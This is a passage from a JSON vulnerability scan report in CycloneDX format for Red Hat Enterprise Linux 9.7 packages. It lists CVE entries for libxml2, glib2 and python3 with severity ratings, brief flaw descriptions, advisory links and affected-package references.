          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0992",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0992"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0992"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429975"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1019"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0992"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0992"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-04-22T10:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.9.13-14.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1484",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1484"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1484"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433259"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3870"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1484"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1484"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.68.4-18.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1485",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        124
      ],
      "description": "A flaw was found in GLib's content type parsing logic. This buffer underflow vulnerability occurs because the length of a header line is stored in a signed integer, which can lead to integer wraparound for very large inputs. This results in pointer underflow and out-of-bounds memory access. Exploitation requires a local user to install or process a specially crafted treemagic file, which can lead to local denial of service or application instability.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1485"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1485"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433325"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3871"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1485"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1485"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.68.4-18.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1489",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1489"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1489"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433348"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3872"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1489"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1489"
        }
      ],
      "published": "2026-01-27T15:15:57+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.68.4-18.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1502",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        93
      ],
      "description": "CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1502"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1502"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1cf9016335cb637c5a425032e8274a224f4b2ed"
        },
        {
          "url": "https://github.com/python/cpython/issues/146211"
        },
        {
          "url": "https://github.com/python/cpython/pull/146212"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-1502.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1502"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1502"
        }
      ],
      "published": "2026-04-10T18:16:40+00:00",
      "updated": "2026-05-10T21:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
